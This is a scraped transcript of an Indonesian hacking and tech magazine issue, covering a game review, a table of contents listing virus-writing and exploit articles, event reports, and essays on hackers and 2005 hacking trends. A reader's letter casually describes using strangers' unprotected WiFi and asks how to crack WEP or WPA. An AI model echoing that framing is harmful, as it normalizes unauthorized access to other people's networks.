neotek vol. iv - no. 11

Upload: ma-rody-candera

Post on 29-May-2018

310 views

Category:

Documents


0 download

TRANSCRIPT

  • 8/9/2019 NeoTek Vol. IV - No. 11

    1/48

    erang..., lagi-lagi perang. Tapi perang yangakan anda temukan jika memainkan game iniberbeda. Kok beda? Yah jelas saja beda, ini

    hanya game atau permainan yang mengambil ceritaperang. Jadi tidak perlu takut, tegang boleh karenamemang menegangkan dan seru sekali.

    Pendidikan Sejarah Dunia

    Hari gini... masih main ular tangga? Ampun..., segeraberalih ke game ini. Apa untungnya main game ini?Pertanyaan yang bagus, dan inilah jawabannya. Ga-me ini mengambil setting sejarah mengenai perada-ban manusia dari dahulu hingga ke jaman modern

    sekarang ini. Cerita mengenai bangsa yang meluas-kan kekuasaannya untuk menjadi pemimpin semuabangsa yang ada di bumi ini. Hitung-hitung sambilbelajar sejarah dunia dari kekuasaan Romawi, Turki,Mongolia, dan lain-lain. Jadi seperti menonton sia-ran Discovery Channel. Selain itu kita akan menge-nal peralatan perang yang kuno sampai kepadayang mutakhir sekarang ini.

    Keunggulan Seri ke-2

    Game ini bisa dibilang sebagai game penyempurnaandari seri pertamanya, dilengkapi kemampuan 3Ddimana kita bisa melihat ke segala arah yang me-mungkinkan. Untuk kemampuan ini diharuskanuntuk m enggunakan wheel mouse.

    Keunggulan lainnya ada pada grafis dimana gambarlebih halus dan jernih, itu yang membuat anda nan-tinya akan beda di depan komputer ketika mencoba

    game ini. Ada lagi keunggulannya, tidak menuntutakan kebutuhan konfigurasi komputer yang tinggi,seperti Pentium II 350 ternyata ok juga. Tapi makinbaik konfigurasi komputer anda akan makin mantaphasil yang didapat.

    Jika anda pernah memainkan game Rise of Nationyang dikeluarkan oleh Microsoft, terkesan adakemiripan sequelnya walau tidak begitu banyak.Ketika dicari tahu siapa pembuatnya ternyata yangmembuat game Rise of Nation adalah orang yangsama yang membuat game Empire Earth II ini. Nahini yang akan membuat anda terbius jika maingame ini , karena Rise of Nation terbilang sukseskehadirannya karena setting sejarah yang dikemasdalam bentuk game memang asyik untuk disimaksecara langsung didepan mata.

    Requirements:

    Windows 98/ ME/ 2000/XPMultimedia PC with Pentium II350 MHz or higher processor64 MB of RAMSuper VGA monitor supporting 1024 x 768 resolutionAGP (4 MB) or PCI (8 MB) 3D video card that supports 1024 x

    768, 16-bit color resolutionMicrosoft Mouse or compatible pointing deviceDirectX-compatible sound card with speakers or headphones

    recommended.

    Empire Earth IIEmpire Earth II

    PP

    NeoSoft

    Empire Earth II dari Sierra Entertainment (www.sierra.com) persembahan game terbaru yang

    merupakan lanjutan dari seri pertamanya, mungkin akan mengikuti jejak terdahulunya menjadigame paling sukses se-antero jagat. Keunggulan yang dimiliki oleh game ini dibanding dengan

    yang pertama adalah kemampuan 3D-nya yang membuat kita bisa melihat ke segala arah.

    Keunggulan lain adalah..., mau tahu? Jajal segera game ini.

    Build an Empire That Spans the AgesBuild an Empire That Spans the Ages

  • 8/9/2019 NeoTek Vol. IV - No. 11

    2/48

    Vol. IV No. 11 NeoTek 1

    HomePage

    NEOTEKNEOTEKDunia Teknologi Baru

    Harga NeoTek + CD:

    Rp22.000,- (P. Jawa)

    Rp22.000,- (Luar P. Jawa)

    Salam!Salam!

    indows bukan lagi operating system yang baru,hampir diseluruh dunia orang mengenalnya dan

    bahkan menggunakannya karena kemudahan da-lam mengoperasikannya, maka Windows dicap sebagaiOperating System yang Friendly User.

    Kejayaan yang terbesar yang pernah dimiliki oleh BillGates raja Microsoft yang sekarang ini mulai memasukirelung-relung bisnis high-end. Kejayaan Bill Gates sedangdi uji, dengan begitu banyaknya hadir virus yang menye-rang komputer-komputer yang menggunakan Windows.Waspadailah..., apalagi anda pengguna Windows.

    Redaksi

    [email protected]

    Windows Security:Windows Security:Dari Scumware sampai WormDari Scumware sampai Worm

    WW

    ? Pengguna Windows lebih banyak dari pengguna Linux atau OS lainnya, dibalik itu ada

    bahaya yang sedang mengintai.

    Bagaimana menghubungi NEOTEK?NEOTEK?KONTRIBUSI [email protected]

    SURAT [email protected]

    [email protected]

    PEMASARANHedhi Sabaruddin, 0812-1891827

    CHATROOM DI DALNET#neoteker

    ADMINISTRASI IKLANTel. 021-5481457 Fax. 021-5329041

    SIRKULASI NEOTEKTel. 021-5481457

    ALAMAT REDAKSI4 Cairnhi ll Rise#05-01 The CairnhillSingapore 229740Telp. +65-67386482email: [email protected]

    MILIS PARA NEOTEKERhttp:/ / groups.yahoo.com/ group/ majalahneotek

    Footprinting

    Scanning

    Enumeration

    Gaining Access

    EscalatingPrivilege

    Pilfering

    Covering Tracks

    CreatingBackdoors

    Denial of

    Service

    Lengkapi pengetahuan hackingdan PC security anda denganberlangganan majalah NeoTek:

    HubungiAswan BakriTel. (021) 5481 457HP. (0812) 9572043 (Aswan)

    email:[email protected]: Aswan Bakri

  • 8/9/2019 NeoTek Vol. IV - No. 11

    3/48

    2 NeoTek Vol. IV No. 11

    Daftar Isi

    Daftar IsiDaftar Isi

    NeoTek Vol. IV No. 11NeoTek Vol. IV No. 11

    Situs NeoTek www.neotek.co.id

    Jadikan situs NeoTek sebagai pangkalan Anda berselancarLink LangsungKunjungi situs-situs yang dibahas dimajalah NeoTek dengan sekali kliklewat situs NeoTek.

    NeoTek versi PDFKehabisan NeoTek di kota Anda?Dapatkan saja versi PDF-nya.

    DownloadTersedia juga download di situsNeoTek selain dari situs aslinya

    Layanan Rupa-rupa NeoTekChannel # neoteker di DalnetNgobrol ramai-ramai sesama NeoTeker

    Web Chat RoomKini tidak usah jauh-jauh untuk ngobrollangsung dengan sesama NeoTeker

    Maili ng ListIni yang paling ramai. Segera ikutanberbagi pengalaman berinternet!

    NeoTeker Offi cial Portalhttp:/ / www.neoteker.or.idSitus komunikasi antar Neoteker.

    Neoteker Internet Radiohttp:/ / dj.neoteker.or.id:8000

    NeoRubrikNeoRubrik

    NeoStyleNeoStyle

    NeoTutorNeoTutor

    Kontribusi HackerKeberadaan Hacker antara

    Pro dan Kontra, tetap saja memilikikontribusi yang penting untuk

    perkembangan komputer.

    6

    Hacking Trend 2005Catatan kecil mengenai isu

    Hacking yang akan menjadi trend di

    tahun 2005.

    7

    NeoStartNeoStartInternet WormsMemahami lebih jauh menge-

    nai cacing komputer yang sebenarnyamemiliki nama keren yaitu Autonomous

    Intrusion Agents.

    9

    ScumWareBiasa berselancar di Internet?

    Inilah bacaan yang penting sebelum

    anda berhadapan dengan ScumWare.

    14

    Social EngineeringTeknik Hacking yang berba-

    haya dan sulit ditanggulangi.

    16

    Membuat Virus 486Belajar membuat virus dengan

    Assembly Langguage Programming.

    18

    Photo Editing:Clone Effect

    Melakukan manipulasi photo dengan

    memberi effect tertentu ternyata dapat

    membrikan hasil yang memuaskan.

    45

    eMbedded VB:Aplikasi Plot3D

    Membuat aplikasi 3 dimensi yang

    sederhana dengan rumus matematika.

    24

    eMbedded VB:Aplikasi TicTacToe

    Melengkapi bahasan membuat game

    di Pocket PC yang sederhana dan

    mengasyikkan.

    28

    eMbedded VB:Aplikasi Puzzle

    Membuat aplikasi game puzzle seder-

    hana yang mengasyikkan.

    26

    SwishMax:Presentasi Animasi

    Membuat makalah presentasi plus

    dengan animasinya.

    46

    FOKUS VOL. IV NO. 11FOKUS VOL. IV NO. 11

    WINDOWS SECURITY

    Worms - Scumware - Uti lManWINDOWS SECURITY

    Worms - Scumware - UtilMan

  • 8/9/2019 NeoTek Vol. IV - No. 11

    4/48

    NeoSoft

    NeoProfil

    NeoTek Vol. IV No. 12

    Sisi Gelap Peer-to-peerFile SharingMasih ingat dengan Napster?Sharing file mp3 yang pernah ada

    yang kini sudah enghilang karenadianggap melanggar Hak Cipta.Bagaimana sistem file sharing hadir?

    Tunggu bahasan yang akan datang

    yang akan mengungkap rahasiatersebut berikut sisi gelap yang

    menyertai sistem ini.

    Linux File SharingMelakukan file sharing dari Linux ke

    Windows, apakah mungkin? Jawaban-

    nya adalah mungkin. Tunggu bahasanini dan anda akan membuktikannya

    ternyata bisa dilakukan.

    Empi re Erat h II

    Buil d an Emeperor0

    Editorial Office4 Cairnhill Rise

    #05-01 The Cairnhill

    Singapore 229740

    Telp. +65-67386482

    Business OfficeGedung Cahaya Palmerah 503

    Jl. Palmerah Utara III No. 9

    Jakarta 11480Telp. 021-5481457

    Fax. 021-5329041

    Bank

    Bank BNI

    a.n. PT NeoTek Maju Mandiri

    No. rekening 070.001709720.001

    Bank Central Asia(khusus untuk langganan)

    Aswan BakriNo. rekening 0940544131

    Pemimpin Umum

    Fachri Said

    Pemimpin Redaksi

    Kosasih Iskandarsjah

    Redaktu r Ahli

    Onno W. Purbo

    Michael S. Sunggiardi

    Pemimpi n Usaha

    Fahmi OemarDadang Krisdayadi

    Redaktur Pelaksana

    MA Rody Candera

    Sekretaris Redaksi

    Marni

    Webmaster

    Supriyanto

    Sirkulasi

    Hedhi Sabaruddin

    Adm. Langganan

    KRISHNAdiSTRIBUTOR

    Iklan dan PromosiGianto Widianto

    Keuangan

    Aswan Bakri

    3

    4

    5

    War game dengan setting

    sejarah perkembangan

    peradaban manusia.

    44

    Seminar Hacking Overview18Desember 2004UIN Jakarta

    Laporan WiFi di TaiwanOleh: Imam Isrowi (TenagaKerja Indonesia di Taiwan)

    Klak KlikEmpire Earth

    Build an EmperorThat Spans the Ages

    Cerita dari Singapura

    Daftar Isi CD NeoTekSpyRemoval - HoneyPot - Java

    - Smartphone Program - eVBSource Code - eVBPaperWhite - Pocket PC

    program - Empire Earth IIDemo Version.

    NeoRagam

    Vol. IV No. 11 NeoTek 3

    NeoTeknoNeoTekno

    Windows Securi ty:Solusi Puisi Cinta

    Mengatasi virus puisi cinta yang cukup

    membuat panik jika tidak tahu cara

    mengatasinya.

    31

    HoneyPot:Anti-Spam BerbasisJava

    Bahasan lanjutan mengenai Honeypot,

    membuat Anti-Spam berbasis Java.

    19

    HoneyPot:HoneyPot denganPhyton

    Bahasan lanjutan mengenai Honeypot,

    membuat Honeypot menggunakan

    Phyton.

    22

    Windows Securi ty:Utak-Atik UserAccount

    Membahas sekuritas dan efektifitas

    yang berkaitan dengan User Account.

    29

    Windows Security:KeePass PasswordSafe

    Menggunakan password yang berbe-

    da untuk tiap account yang dimiliki

    seringkali merepotkan. Trik berikut

    dapat membantu anda.

    33

    Windows Securi ty:Gaining Access Tool

    AccessDiver, tool yang berguna ketika

    mencapai tahapan Gaining Access

    dalam anantomi proses hacking.

    34

    Windows Securi ty:Utility ManagerExploit

    Menambah dan memperbaiki Utility

    Manager Local Exploit yang dimiliki

    oleh WinXP.

    35

    Daftar Isi

    Computer Secur it y:Port dan bahayanya

    Mengenal port lebih jauh berikut

    bahayanya yang memanfaatkan port

    sebagai jalan penyerangan.

    39

  • 8/9/2019 NeoTek Vol. IV - No. 11

    5/48

    4

    NeoRagam

    GAME BULAN INI

    Empire Earth IIBuild an Emperor

    93.3 MB

    ari awal peradabanmanusia, keinginanuntuk memperluas kekua-saan sudah ada walaupunharus dengan jalan perang.

    Games yang mengambilsetting dari sejarah ini as-yik untuk dimainkan, me-nguji kemampuan andasebagai pemimpin suatubangsa untuk menunduk-kan bangsa lain. Menjadibangsa pemimpin seluruhbangsa yang ada di bumi.

    Berawal dari jaman yang

    masih sederhana perala-tan perangnya sampaimenuju masa moderndengan peralatan perangcanggih.

    - Wi n 95/98/N T/XP

    - DirectX 8.0 or Direct-Xcompatible SVGA videocard

    - Pentium 950 MHz or higher

    - 64 MB RAM

    - Super VGA monitorsupporting 1024 x 768resolution

    - AGP (4 MB) or PCI (8 MB) 3Dvideo card that supports1024 x 768, 16-bit colorresolution

    - Microsoft Mouse orcompatible point ing device

    - 32x CD ROM drive

    Klak Klik

    NeoTek Vol. IV No. 11

    D

    ni laporan hasil perja-lanan Neotek ketika

    kunjungan ke Singapura.Negara kecil tapi memilikitingkat perekonomian yangbaik dan bisa dikatakan ne-gara maju.

    Berbicara TI (Tekn ologi In-formasi), Singapura tidaktertinggal bahkan produk-produk yang dihasilkanoleh teknologi yang caggihseperti saat sekarang in icepat hadir memenuhi pa-sar dan menemani gaya hi-dup warga Singapura. Up-grade wawasan mengenaiTI, Singapura lebih dekatdijangkau dari Indonesia.Oleh sebab itu, jika anda

    ingin menyadari bahwasanbahasan teknologi yang di-miliki Neotek selalu lebihcepat dibanding majalahlain yang berbendera tek-nologi. Sebagai Contoh,Bluetooth. Pertama kali Neo-tek membahas Bluetoothyaitu 4 tahun yang lalu(Volume I). Beruntunglahanda pembaca setia Neotek.

    Akses Internet

    Berbicara mengenai ini yangbikin iri kita pada Singa-

    pura. Kapan yach Indonesiabisa seperti Singapura me-ngenai akses internet?

    Di Singapura, penggunaakses internet dibagi men-jadi 2 yaitu personal (peng-guna rumahan) dan peru-sahaan. Biaya akses Inter-

    net un tuk perusahaan ber-

    beda sedikit saja denganbiaya yang ditetapkan ISPyang ada di Indonesia, tapibiaya akses internet untu kpersonal ini yang bikin ke-jutan. Hanya $80/bulan(dengan hitun gan kursRp5.400,00 jadi total biayabulanan un tuk akses inter -net di Singapura bagi peng-guna personal yaituRp432.000,00), kita sudahdapat menikmati akses in-ternet Unlimited dengankecepatan 1500 Mbps (1,5

    Gbps).Nanyang Polytechnic

    NYP (Nanyang Polytechnic),salah satu perguruan tinggiyang ada di Singapura yanginterest terhadap pendidikanyang memanfaatkan tekno-

    logi yang nanti hasilnya

    dibutuh kan oleh industri,kini membuka jurusan ba-ru yang diberi nama Digi-tal Entertainment Techno-logy. Jika di Indonesia adaDigital Studio.

    Digital EntertainmentTechnology memakai tek-nologi informasi untukmenciptakan dan mema-sang hiburan , seperti efekvisual, animasi dan per-mainan komputer.

    Anda tertarik? Buka situs-

    nya di www.nyp.edu.sg danternyata di Singapura ba-nyak orang Indonesia jugayang suka berbelanja kare-na relatif murah, katanyagitu...

    CERITA DARI SINGAPORE

    I

    School of Information Technology, Nanyang Polytechnic. Programpendidikan setingkat diploma untuk jurusan teknologi digitalentertainment. Di Indonesia ada Digital Studio.

    Kampus modern NanyangPolytechnic, Singapura..

  • 8/9/2019 NeoTek Vol. IV - No. 11

    6/48

    Vol. IV No. 11 NeoTek 5

    NeoRagam

    acking O verview. Be-gitu t opik seminar

    yang diadakan oleh BadanEksekutif Mahasiswa UINJakarta pada tanggal 18Desember 2004.

    Menambah Wawasan

    Acara ini diadakan bertu -juan untuk menambah wa-wasan mengenai hacking,oleh sebab itu topik yangdipilih yaitu HackingOverview.

    Acara ini dikemas denganmelibatkan NeoTeker baiksebagai pembicara maupunsebagai demo hacking. JimGeovedi, yang aktif pada

    Bellua Asia Pasifik sebagai Information SecurityConsultantjuga ikut ambilbagian membagikan penge-tahuannya kepada peserta.Peserta akhirnya t idak ha-nya saja tahu apa itu danini tentang hacking tetapijuga plus mengetahui arahhacking itu nantinya jikaberkeinginan terjun seba-gai professional worker.

    Dani Firmansyah m enyem-patkan diri hadir di acaratersebut, menambah nilaitersendiri bagi peserta t er-hadap sosok yang sempatmenggegerkan TI KPU.

    Antusias Peserta

    Antusias peserta terhadapacara terlihat sangat positifdan baik sekali, terbuktidengan penuhny a kursi

    yang ada dan juga ternyatapeserta wanita tidak kalahjumlahnya dibanding pe-serta pria. Acara yang dimu-lai pada pukul 09.30 WIBdan berakhir pada sore ha-rinya mendekati pukul17.30, ternyata tidak me-mungut biaya yang tidakmahal alias murah dan sa-ngat terjangkau bagi kan-tong mahasiswa. Ada yangpernah jadi mahasiswa?

    Acara berakhir sukses danbanyak cerita yang terukir,tunggu berita kegiatan paraNeoTeker mengisi waktudengan kegiatan positif.Yes Hacking and No Dr ugs

    Berikut adalah orang-orangyang t erlibat mendukungacara:

    Pembicara:

    1. A. Zakaria2. Ody3. Jim Geovedy

    Demo:

    1. Andi Ismayadi2. Beta Andri3. Ricky4. Yoki S

    aya menyampaikan ten-tang Wifi (Frek 2,4 Ghz

    di Taiwan khususnya wilayahTaichung (Taiwan Tengah).

    Saya berkeliling di Taichungdalam radius 2 Km persegidengan membawa PDA ber-wifi. Terny ata banyak sekali

    Hotspot, AP atau SSID yangsaya jumpai. Dalam area ter -sebut, di pusat bisnis elektro-nik yang paling banyak AP.Sepertinya private AP. Jadijangkauannya tidak jauh. Halini ditunjukkan kalau kita pin-dah tempat, maka AP (SSID)tersebut tidak terdeteksi lagialias hilang.

    Namun yang paling kuat dayapancarnya ada 2 Hotspot Out-door. Yaitu Easy-Up danMobeelan (SSID=Mobitai).Namun keduanya bayar alias

    langganan, tapi masih mem-berikan akses Free dengan

    cara telepon pakai Handphoneselama 1 menit ke nomor ter-tentu, dan akan dikirimi SMSberisi Username dan Password.satu menit telepon kita diberi20 Menit OnLine. Jadi setelahconnect dengan SSID Mobitai,maka akan muncul halaman

    login di Browser kita. Baru ki-ta menelpon 1 menit, dan 5 de-tik kemudian kita sudah men-dapat Username dan Password.Setelah kita masukkan, kitasudah bisa browsing 20 menit.

    Jika kita jalan-jalan ke Aparte-men yang kira-kira ada WiFi,disana akan ditemukan banyaksekali AP Private. Yang ternyatakadang-kadang tidak di pro -teksi (Encrypt). Kita tinggalnyantol saja maka kita sudahbisa browsing sepuasnya.

    Tapi jika yang punya tahu ada

    yang nyantol, maka AP dima-tikan. Dan bila menemukan

    AP/SSID yang di proteksi, se-ring kita diminta setting Proxy.Ada yang tahu cara masukatau bobol WEP or WPA? Ka-lau mau benar-benar FREE,kita pergi ke kampus atau se-kolah yang dipasang HotspotOutdoor Free. Browsing se-

    puasnya, dan kecepatannyasangat memu askan. SetelahIcon Connect muncul, kitalangsung bisa browsing.

    Kapan ya negeri kita bisa se-perti ini. Rasanya jadi betahtinggal di negeri orang.

    Kami sedang mengumpulkandana bantuan untuk saudarakita di Aceh. Kami didukungoleh Palang Merah Taiwan(Taichung), sehingga kami ju-ga boleh menerima sumbangandari orang Taiwan. Rencana-nya akhir bulan ini kita akan

    kumpulkan jadi satu seluruhTaiwan atas nama TKI Taiwan.

    Kami juga selalu cek beritaterakhir di www.airputih.or.iddan kami rangkum, kami fotocopy dan kemu dia kami sebar-kan ke teman-t eman TKI diTaiwan atau di pasang di papan-papan pengumuman yang adadi warung-warung Indonesia

    di Taiwan.Sekian laporan kami, atas per-hatian r ekan-rekan, kami ucap-kan terima kasih. Salam darikami, TKI Taiwan.

    Informasi tambahan

    Laporan lainnya mengenaiW iFi di Taiwan pernah dimuat di majalah NeoTek Vol.IV No. 09, di bagian N eoInbox(Neoteker MenjawabNeoteker).

    SEMINAR HACKING OVERVIEW DI UIN (UNIVERSITAS ISLAM NEGERI) JAKARTA

    Laporan WiFi (2,4 GHz) di Taiwan Imam Isrowi ([email protected])

    H

    S

    Seminar Hacking Overview di Universitas Islam Negeri Jakarta yangmelibatkan NeoTeker sebagai pembicara. Acara juga dihadiri olehsesepuh hacking Indonesia seperti Dani Firmansyah dan Jim Geovedi.

  • 8/9/2019 NeoTek Vol. IV - No. 11

    7/48

    6

    NeoRubrik

    NeoTek Vol. IV No. 11

    EMAJUAN TEKNOLOGI INFORMASI

    yang sangat pesat saat ini masihmempertanyakan keberadaan

    hacker bagi beberapa kelompok masya-

    rakat yang kurang mendapatkan infor-masi lengkap tentang siapa sebenarnyayang dimaksud dengan hacker danperan yang dimainkannya bagi kema-juan teknologi informasi.

    Susah memang kalau sebuah persepsiyang sudah terbentuk di masyarakatdimana kini menjadi patokan dasar un-tuk memahami siapa sebenarnya hackeritu. Ada yang harus dipahami kembalibahwa hacker itu bukanlah sebuah pe-ngakuan dari orang yang jago kompu-ter tapi lebih kepada pemberian pang-kat atau gelar bagi orang-orang yang

    sangat mahir dan berbakat dalam halpemrograman dan teknologi jaringan.

    Pertanyaannya, kenapa hanya pemro-gramman dan jaringan? Tentu yangharus dimengerti bahwa kemajuanteknologi komputer dan telekomuni-kasi terbentuk karena daya olah ataukreatifitas manusia dalam memprogramsebuah sistem dan aplikasi. Kemajuanteknologi komunikasi sekarang ini ju-ga merupakan hasil dari olah kreatifi-tas manusia dalam teknologi jaringan.Tidak dapat di pungkiri keberadaan tek-nologi internet merupakan hasil kontri-busi dari para hacker di seluruh dunia,

    dengan ketrampilannya mampu me-nyambungkan elektron-elektron me-lalui kabel dan media udara (ether) kedalam digit-digit data yang dapat di-mengerti oleh sistem komputer.

    Bicara tentang persepsi hacker, saat iniada 2 pendapat yang muncul di masya-rakat dan kedua pendapat itu salingbertentangan. Bagi orang yang awamteknologi (gaptek) akan melihat sosokhacker sebagai tokoh hitam yang ja-hat, pekerjaannya hanya merusak sis-tem komputer orang lain. Sementarapendapat yang lain mengatakan bahwa

    hacker adalah jagoannya komputeryang bisa menembus lapisan sekuriti

    di sebuah jaringan atau sistem komputer.Persepsi pertama tentu negatif karenamelihat sosok hacker dari tindakannyayang seringkali membobol sistem kom-

    puter milik orang lain walaupun sebe-narnya penulis yakin orang yang me-mahami persepsi ini juga tidak menge-tahui apakah si hacker itu merusakatau tidak. Persepsi kedua terkesan po-sitif karena yang dilihat adalah kemam-puan yang dimiliki oleh hacker itu sen-diri menurutnya hebat dan sangat ah li.

    Perbedaan persepsi inilah terkadangmenjadikan keberadaan hacker masihsering ditakuti oleh beberapa kelompokmasyarakat bisnis. Mungkin juga ka-rena si pemilik usaha/ bisnis terlalu se-ring mendengarkan berita di media

    tentang hacker yang suka menyerangdan sering terlalu kreatif menembussistem-sistem level keamanan kom-puter di jaringan.

    Hacker tidak selalu menyerang tapi jugasangat paham dengan metode defensifdan banyak memiliki solusi dalambertahan di jaringan internet yang liar,bahkan sebenarnya hacker memilikikode etik yang ketat dan salah satu kodeetiknya adalah memberitahu kepadapemilik sistem akan adanya lubang/bugsecurity di sistem yang dia analisa.Maka jangan heran bila beberapa hackerprofesional lebih terbuka untuk

    menjalin komunikasi dengan systemadministrator sebuah perusahaan, dansebenarnya keduanya bisa saling ber-kolaborasi dan bekerja sama dalammembangun sistem pertahanan yanglebih baik. Hacker profesional lebihsenang jika di panggil sebagai WhiteHatatau dalam istilah umum pakarkeamanan jaringan dan bukan hackerkarena dia konsisten dengan profesinyasementara julukan hacker hanyamerupakan pemberian (assign) darikomunitas. Bagi kalangan bisnissebenarnya keberadaan hacker bisa dimanfaatkan untuk mengamankan asset-

    asset perusahaan yang nilainyamungkin bisa ratusan milyar perhari

    kecuali jika Anda siap untuk kehilanganasset Anda yang nilainya besar itu.

    Sedikit saran untuk para kalangan bis-nis yang menggantungkan assetnyapada seutas kabel di komputer yangdatanya berseliweran di jaringan kom-puter, perlu dipahami bahwa data lossbisa terjadi oleh beberapa hal dianta-ranya karena virus, aplikasi yang error,sistem yang tidak bekerja maksimal,gangguan fisik dan teknis akibat sistemyang t idak di-manajemen dengan baik,kelemahan penerapan policy keamanan,serta serangan-serangan dari int ruderdi jaringan.

    Hacker professional dapat menawar-kan konsep dan metode yang lebihbaik dalam soal keamanan jaringan di

    sistem yang Anda miliki karena meto-dologi risk assassment (analisa dampak& kerusakan sistem) yang diterapkanhacker menggunakan patokan dasarsecurity (advisory) yang t iap hari ter-update (tiap hari para hacker professionalmendapatkan report dari komunitassecurity internasional tentang bug-bugdi sistem komputer), dan hacker profes-sional jelas memiliki standarisasi secu-rity yang jelas dalam mengamankanjaringan karena dia memiliki sistempolicy dan network policy yang lebihbaik karena didukung resources dankeahlian yang dia miliki.

    Sudah saatnya bagi kalangan bisnis un-tuk memberikan kesempatan bagi parahacker untuk terjun di dunia IT secaraterbuka dan proffesional agar aktifi-tasnya dalam menyalurkan adrenalindi jaringan internet yang liar bisa le-bih tersalurkan secara positif dan pe-nulis yakin akan banyak manfaatyang bisa diambil karena terbuktikeberadaan internet yang dibuat olehpara hacker hingga saat ini berkem-bang menjadi teknologi yang luarbiasa dan sangat membantu aktifitastelekomunikasi yang mana memba-

    ngun effektifitas dan effesiensi kerja.

    KONTRIBUSI HACKER DALAM PERKEMBANGAN KOMPUTER

    K

    Pro dan kontra terhadap keberadaan hacker antara pandangan negatifdan pandangan yang positif, menghadirkan deretan panjang daftar

    pertanyaan-pertanyaan yang membutuhkan jawaban sebagai solusi.

    Dani Firmansyah([email protected]) mengupasHackeryangsesungguhnya demi menyatukan persepsi kita bersama mengenai

    hacker berikut kontribusinya dalam perkembangan komputer yang

    sekarang ini anda rasakan sendiri nilai plus dari kemajuan komputer

    bersama internet didalamnya.

  • 8/9/2019 NeoTek Vol. IV - No. 11

    8/48

    Vol. IV No. 11 NeoTek 7

    NeoRubrik

    ELAMAT TAHUN BARU 2005. Ti-dak terasa saat ini kita sudahberada di tahun 2005. Sembari

    menyelesaikan beberapa tugas, saya

    menyempatkan diri untuk membuatcatatan kecil mengenai trend hackingtahun ini berdasarkan informasi yangsaya kumpulkan dari berbagai sumberdi Internet.

    Hacking selalu menjadi isu yang me-narik. Namun apakah yang menjaditrend di tahun 2005 ini? Mari kitasimak beberapa topik hacking yangsaya prediksikan akan menjadi trenddi tahun 2005 ini.

    1. Web Systems Hacking

    Pada pertengahan tahun 2004, peris-

    tiwa defacement pada website tabulasinasional Pemilu 2004 (tnp.kpu.go.id)dari KPU menjadi headline news dibanyak media lokal maupun interna-sional.

    Pernyataan bahwa firewall dapat me-lindungi serangan hacker terpatahkanbegitu saja karena penyerang m eman-faatkan protokol yang firewall-friendly.Web attacks dapat melintasi firewallbegitu saja karena memang bukan tu -gas firewall untuk melakukan inspeksicontent dari setiap packet terutamapada protokol yang diijinkan melintas.

    Seiring dengan semakin banyaknyapemanfaatan aplikasi web seperti webforum, news/art icles publishing tools,dan lain-lain. Maka tahun 2005 ini,diperkirakan proses auditing dari webcodes akan mendapat perhatian yangsangat tinggi.

    2. Database Hacking

    Jika pada tahun-tahun sebelumnyaperusahaan banyak mencurahkanperhatiannya pada perlindunganjaringan namun sedikit yang mem-berikan perhatian unt uk melindungisalah aset penting mereka yaitu

    database. Pada tahun 2005 ini, data-base security akan mendapatkan

    perhatian extra, terlebih dari merekayang meny impan data penting danrahasia. Hal lain yang memicu adalahtingginya aksi penyerangan dan

    pengerusakan dengan menggunakanSQL injection pada tahun lalu.

    3. Honeypot Hacking

    Honeypot adalah sebuah resourceyang dipergunakan untuk mempela-jari "blackhat." Pada dasarnya sebuahhoneypot adalah sebuah sistem kom-puter yang tidak memiliki nilai lebihdan diharapkan tidak ada seorang punyang memiliki ketertarikan padanya,sehingga kalau ada seorang yang ter-tarik, sepertinya orang tersebut ter -tarik untuk kepentingan yang ilegal.

    Dari sisi eksternal, agak sulit dibeda-kan antara honeypot dan sistimkomputer biasa. Sehingga identifikasisebuah sistim adalah sebuah honeypotdiperkirakan akan menjadi trendtahun 2005 ini.

    4. Passive Information Gathering

    Information gathering adalah tahapawal sebuah proses hacking. Padaacara DEFCON 12 (www.defcon.org),Johnny Long (johnny.ihackstuff.com)mempresentasikan metode passiveinformation gathering menggunakansearch engine.

    Ada banyak metode pencarian yangbisa diperoleh dari websitenya. Danpada tahun 2005 ini, metode penca-rian secara pasif akan semakinberkembang lagi.

    5. Hardware Hacking

    Pernah berpikir untuk menggunakaniPod (www.apple.com/ ipod) untukmenyerang dan menguasai sistemkomputer lain? Sepertinya tidak mung-kin, bukan?

    Namun tidak menurut MaximilianDornseif (md.hudora.de), seorangpeneliti dari RWTH Aachen Univer-

    sity (www.rwth-aachen.de) yangmempresentasikan metode hackingdengan judul

    0wn3d by an iPod: Firewire/1394 Issues(md.hudora.de/presentations/#firewire-pacsec) pada konferensi PacSec.jp(www.pacsec.jp) pada bulan Novem -ber 2004 lalu.

    Tahun 2005 diperkirakan trend hard-ware hacking akan meningkat. Salahsatu contohnya adalah

    USB DMA Attack

    yang akan dipresentasikan David Maynor(www.bellua.com/bcs2005/asia05.speakers.html#david) pada konferensi

    Bellua Cyber Security 2005(www.bellua.com/bcs2005)

    di Jakarta pada bulan Maret 2005.

    Topik hardware hacking lain yangtidak kalah menariknya adalahBluetooth (www.defcon.org/html/defcon-12/dc-12-speakers.html#laurie) hacking.

    Jim Geovedi kini akt if sebagaiInformation Security Consultantpada PT Bellua A sia Pacific.

    HACKING TRENDS 2005

    S

    Memasuki dan mulai sedikit demi sedikit menapaki tahun 2005, tahun

    2004 kini sudah berada di belakang. Mengamati perkembangan

    Internet yang terus melaju, masalah hacking sudah pasti hal yang asyik

    untuk diperbincangkan. Jim Geovedi ([email protected])membeberkan catatan kecilnya mengenaiTrend Hacking Tahun

    2005, khusus untuk dibagikan kepada para pembaca NeoTek.

  • 8/9/2019 NeoTek Vol. IV - No. 11

    9/48

    NeoStart

    Vol. IV No. 11 NeoTek 9

    NDA TENTU MASIH INGAT IKLAN DI MEDIA TELEVISI

    beberapa tahun silam, Anak anda cacingan? Ber-hubungan dengan cacing, tulisan ini membahascacing yang berbeda bentuk. Cacing-cacing di

    Internet (Worms) adalah Autonomous Intrusion Agentsyang mampu melakukan penggandaan diri dan menyebardengan memanfaatkan kelemahan-kelemahan sekuriti(security flaws) pada services yang u mum digunakan.Worm bukanlah sebuah fenomena baru, ditemukan per-tama kali penyebarannya pada tahun 1988. Worms telah

    menjadi sebuah ancaman yang mematikan di Internet,walaupun sebagian besar kasus yang terjadi secara spesi-fik adalah pada sistim berbasis Windows. Beberapa jenisworms terbaru memanfaatkan electron ic mail (e-mail)sebagai medium penyebarannya.

    1. Metode Akti vasi dan MekanismePenyebaran

    Perbedaan mendasar ant ara worm dan virus terletak padabagaimana mereka membutuhkan intervensi user untukmelakukan penggandaan diri dan menyebar menginfeksisistim komput er. Virus lebih lambat dalam melakukan pe-nyebaran jika dibandingkan dengan worm. Namun virusmempunyai kemampuan lebih untuk menghindari detek-

    si program-program anti-virus yang berusaha mengiden-tifikasi dan mengontrol penyebaran virus pada sistimkomputer. Namun pada praktek penyebarannya sebuahvirus dapat menjadi sebuah worm.

